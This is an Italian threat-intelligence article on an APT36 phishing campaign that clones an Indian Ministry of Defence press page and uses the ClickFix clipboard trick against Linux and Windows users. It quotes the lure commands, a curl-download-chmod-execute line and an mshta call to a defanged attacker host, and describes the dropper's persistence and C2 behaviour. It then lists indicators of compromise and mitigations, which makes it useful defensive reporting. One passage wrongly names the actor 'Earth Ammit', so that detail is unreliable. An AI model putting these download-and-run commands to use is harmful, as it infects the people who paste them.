APT36 usa ClickFix per infettare utenti Linux

Una campagna di phishing altamente mirata e strutturata attorno a una finta pagina stampa del Ministero della Difesa indiano è stata recentemente attribuita con media confidenza al gruppo APT36, noto anche come Transparent Tribe. L’operazione, scoperta dal team di Hunt.io, si distingue per l’uso raffinato di meccanismi di social engineering, distribuzione cross-platform (Windows e Linux) e l’impiego della tecnica ClickFix, che sfrutta la manipolazione della clipboard per veicolare comandi malevoli pronti per l’esecuzione da parte dell’utente.

Gli attaccanti hanno replicato fedelmente l’aspetto e la struttura del sito ufficiale del Ministero della Difesa indiano, utilizzando una combinazione di domini compromessi, immagini clonate e falsi documenti PDF, inducendo l’utente a eseguire comandi shell o script HTA camuffati da semplici procedure di verifica CAPTCHA.

A differenza di campagne APT più complesse, Earth Ammit punta su un basso profilo tecnico e un alto tasso di credibilità visiva, sfruttando in modo innovativo:

• Pagine press release clonate tramite HTTrack;
• Redirect condizionati per sistema operativo;
• Esecuzione silente via clipboard (bash su Linux, mshta.exe su Windows);
• Payload HTA offuscati via escape sequence esadecimali.

Clonazione del sito del Ministero della Difesa e trappola ClickFix: la variante Linux

La componente Linux della campagna ClickFix mette in luce una strategia subdola basata su imitazione visiva, reindirizzamenti condizionati e clipboard hijacking, finalizzati a portare l’utente all’esecuzione manuale di comandi shell per l’infezione del sistema.

Il dominio malevolo email.gov.in.drdosurvey[.]info, registrato con Namecheap e camuffato da sottodominio governativo, ospita una copia clonata del portale stampa del Ministero della Difesa indiano. La replica è generata tramite HTTrack, uno strumento di mirroring pubblico, come confermato da metadati HTML estratti nel codice sorgente. L’interfaccia visuale simula la struttura mensile degli archivi stampa ufficiali, ma l’unico link attivo è quello relativo a marzo 2025, elemento chiave per attivare la catena d’infezione.

Se l’utente accede alla pagina da un sistema Linux, viene rediretto a captcha/linux.php, dove compare un CAPTCHA semplificato con un bottone etichettato “I’m not a rebot” – una probabile distorsione voluta del classico messaggio CAPTCHA, forse per evitare rilevamento automatizzato o pattern-based detection.

Al clic, il sito copiava silenziosamente nella clipboard dell’utente un comando shell simile al seguente:

bashCopiaModificacurl -o mapeal.sh https://trade4wealth[.]in/admin/assets/js/mapeal.sh && chmod +x mapeal.sh && ./mapeal.sh

Il comando richiama un file .sh ospitato su un altro dominio compromesso, trade4wealth[.]in, valutato come asset abbandonato o riutilizzato malevolmente. L’utente veniva poi guidato verso una pagina successiva (linux-guide.php) che mostrava un overlay con istruzioni per incollare il comando nel terminale, attivando così il payload.

Il contenuto del file mapeal.sh, secondo quanto osservato in analisi dinamica, non eseguiva alcun comportamento malevolo evidente: si limitava a scaricare un’immagine JPEG e ad aprirla in background. Ciò indica che il modulo era probabilmente un placeholder o una fase iniziale in attesa di essere aggiornato, in linea con altre operazioni APT che iniziano con dropper innocui in attesa di contesto.

Particolarmente insidioso è il fatto che il flusso spinga l’utente a eseguire volontariamente il comando copiato, sfruttando tecniche persuasive e pseudo-istituzionali, senza necessità di privilege escalation o exploit tecnici immediati.

ClickFix su Windows: esecuzione via HTA, spoofing di sicurezza e dropper .NET

A differenza della variante Linux, la campagna ClickFix su Windows presenta una catena d’infezione più immediata e integrata nel contesto visivo del sistema operativo, sfruttando il componente mshta.exe – uno strumento legittimo di Microsoft utilizzato per l’esecuzione di applicazioni HTML – come vettore primario per l’esecuzione del payload.

Quando un utente Windows visita la versione corrispondente del sito (captcha/windows.php), gli viene presentato un finto avviso governativo con marchi istituzionali, accompagnato da un messaggio simulato in stile “verifica della firma digitale del dispositivo”, corredato da una finestra modale che invita a cliccare per iniziare la “convalida”.

Il click attiva immediatamente mshta.exe per eseguire un file HTA offuscato, richiamato da un URL del tipo:

bashCopiaModificamshta https://trade4wealth[.]in/admin/assets/js/mapeal.hta

Il file mapeal.hta, analizzato tramite strumenti statici, presenta una struttura HTML con script JScript offuscato tramite encoding esadecimale, progettato per evadere l’analisi euristica. Al decoding, lo script scarica un secondo stadio rappresentato da un eseguibile .NET dropper, salvato con nomi neutri e installato nella cartella %TEMP% con estensione .exe.

Il dropper è stato identificato come un modulo compiled in C# con funzioni principali:

• Persistence: creazione di chiave Run nel registro (HKCU\Software\Microsoft\Windows\CurrentVersion\Run)
• Environment check: rilevamento di macchine virtuali e sandbox via query WMI
• Callback: connessione al server di comando e controllo (C2) via HTTP POST su user.php endpoint
• Payload delivery: download e caricamento in memoria (reflective) del modulo successivo

Il dominio di callback primario, trade4wealth[.]in, è stato anche associato ad attività precedenti riconducibili ad APT36. L’infrastruttura del dominio si appoggia su server NGINX con mod_rewrite attivi, consentendo la redirezione dinamica e la rotazione degli endpoint.

Le comunicazioni tra il dropper e il C2 utilizzano header HTTP mimetizzati con campi User-Agent fittizi come Microsoft-CryptoAPI/10.0, a rafforzare l’effetto di legittimità agli occhi di tool di ispezione automatica.

Va notato che, mentre la tecnica HTA via mshta.exe non è nuova, il contesto narrativo – ossia la falsa verifica governativa e l’apparente obbligatorietà della procedura – incrementa notevolmente l’efficacia sociale della minaccia, spingendo alla sua attivazione anche in ambienti più sensibili, come quelli ministeriali.

Infrastruttura APT36 e indicatori di compromissione: la rete dietro ClickFix

L’infrastruttura della campagna ClickFix mostra una configurazione coerente con altri attacchi condotti dal gruppo APT36, noto anche con i nomi Transparent Tribe o Mythic Leopard. Gli asset analizzati confermano un pattern operativo ormai consolidato: registrazione di domini typosquatted, hosting su server condivisi o compromessi, e distribuzione multi-stadio gestita da script dinamici lato server.

Il dominio centrale trade4wealth[.]in rappresenta l’hub operativo della campagna: serve contemporaneamente file .sh, .hta e .exe, agendo come storage per i payload secondari e punto di callback per i dropper. È ospitato presso un provider situato in India, con configurazioni DNS dinamiche e certificato SSL autofirmato, spesso rigenerato per sfuggire a meccanismi di fingerprinting.

Parallelamente, il dominio drdosurvey[.]info, registrato tramite Namecheap, è utilizzato per il primo livello di spoofing e phishing. Esso simula il sottodominio email.gov.in, sfruttando l’autorità percepita del suffisso governativo per ingannare l’utente e dare legittimità alla pagina clonica. Anche qui, l’infrastruttura DNS mostra segni di configurazione rapida e temporanea, tipici delle operazioni APT orientate alla durata contenuta ma ad alto impatto.

Durante l’analisi, sono stati identificati diversi indicatori di compromissione (IOC) che possono essere utilizzati per il threat hunting:

Domini malevoli

• drdosurvey[.]info
• trade4wealth[.]in

File

• mapeal.sh (bash dropper)
• mapeal.hta (HTA con payload offuscato)
• NetSupportClient.exe (eseguibile .NET rifattorizzato)

Hash (SHA256) noti

• 24d9112dba8a... (mapeal.hta)
• 3c81b7653e71... (NetSupportClient.exe mod.)

Endpoint di comando e controllo

• https://trade4wealth[.]in/admin/assets/js/user.php

Header HTTP sospetti

• User-Agent: Microsoft-CryptoAPI/10.0
• Referer: https://email.gov.in.drdosurvey[.]info

Il confronto con altre campagne precedenti di APT36 mostra una continuità metodologica: anche in casi precedenti, come la campagna Crimson RAT del 2021, il gruppo aveva utilizzato portali governativi cloni e HTA dropper distribuiti tramite mshta.exe, indicando un’evoluzione incrementale piuttosto che un cambio radicale di strategia.

Ciò suggerisce che ClickFix non è un’operazione isolata, ma parte di una catena tattica a lungo termine mirata a colpire enti governativi e difensivi nel subcontinente asiatico, mantenendo un profilo basso, ma persistente.

Contromisure proattive e mitigazioni: difendersi da ClickFix tra clipboard, HTA e spoofing visivo

La campagna ClickFix dimostra ancora una volta quanto sia sottile il confine tra persuasione sociale e compromissione tecnica, soprattutto in contesti governativi dove l’apparenza istituzionale può aggirare anche i più rigidi protocolli operativi. La combinazione di clipboard hijacking (su Linux) e HTA execution (su Windows) richiede un approccio multilivello nella difesa, che tenga conto sia del vettore tecnico che del contesto visivo e comportamentale.

Per sistemi Windows, le misure più efficaci includono:

• Disabilitazione o controllo stretto su mshta.exe, tramite AppLocker o Group Policy, soprattutto su endpoint dove le applicazioni HTA non sono necessarie;
• Monitoraggio dei processi HTA via EDR, impostando alert su comandi che coinvolgono domini esterni o percorsi TEMP;
• Controllo avanzato su clipboard e paste event, in particolare su browser che possono essere indotti a scrivere codice shell o script nella clipboard senza azione esplicita dell’utente;
• Educazione del personale: promuovere un comportamento critico verso “verifiche digitali” che richiedono input manuale o comandi, soprattutto in portali apparentemente governativi.

Per sistemi Linux-based, è fondamentale:

• Bloccare script bash non autorizzati nei terminali utenti, utilizzando controlli RBAC (role-based access control);
• Monitorare le clipboard X11/Wayland in ambienti desktop, mediante estensioni che rilevino sostituzioni automatiche del contenuto;
• Impedire l’esecuzione diretta da clipboard nei terminali (es. inibire shortcut che incollano ed eseguono simultaneamente il contenuto copiato);
• Inserire filtri proxy e DNS per bloccare domini noti o sospetti, in particolare quelli con somiglianza istituzionale (es. email.gov.in.drdosurvey.info).

Dal punto di vista difensivo proattivo, i team SOC e Blue Team dovrebbero:

• Creare regole YARA o regole Sigma per identificare esecuzioni anomale di mshta.exe, soprattutto se puntano a URL HTTP/HTTPS esterni;
• Usare sandbox comportamentali per HTA e shell script scaricati da fonti non verificate, al fine di analizzare comportamenti non immediatamente visibili;
• Applicare controlli DNS dinamici e ispezione TLS per identificare beaconing verso C2 esfiltrativi come trade4wealth[.]in.

In conclusione, ClickFix evidenzia che la minaccia APT36 resta attiva, adattiva e focalizzata sulla persuasione e la manipolazione psicologica, molto più che su tecniche di exploitation ad alta complessità. Il rafforzamento della consapevolezza e il controllo dei vettori laterali – clipboard, HTA, spoofing visivo – diventano quindi essenziali per contenere attori in grado di colpire sfruttando la fiducia nel contesto, non la vulnerabilità tecnica.